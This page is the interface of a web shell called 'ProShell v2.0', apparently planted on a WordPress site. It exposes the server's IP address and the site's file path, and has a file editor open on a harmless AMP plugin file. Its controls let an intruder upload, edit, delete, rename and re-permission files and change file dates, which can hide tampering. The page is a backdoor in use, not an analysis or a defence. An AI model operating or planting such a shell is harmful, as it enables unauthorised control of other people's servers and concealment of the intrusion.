ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-14 20:39:20
Editing: CliCommand.php
Cancel
Save Changes
<?php /** * Interface CliCommand. * * @package AmpProject\AmpWP */ namespace AmpProject\AmpWP\Infrastructure; /** * A CLI command to be registered with WP-CLI. * * A class marked as being a CLI command will automatically be registered * as a command with WP-CLI. * * @since 2.1.0 * @internal */ interface CliCommand { /** * Get the name under which to register the CLI command. * * @return string The name under which to register the CLI command. */ public static function get_command_name(); }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete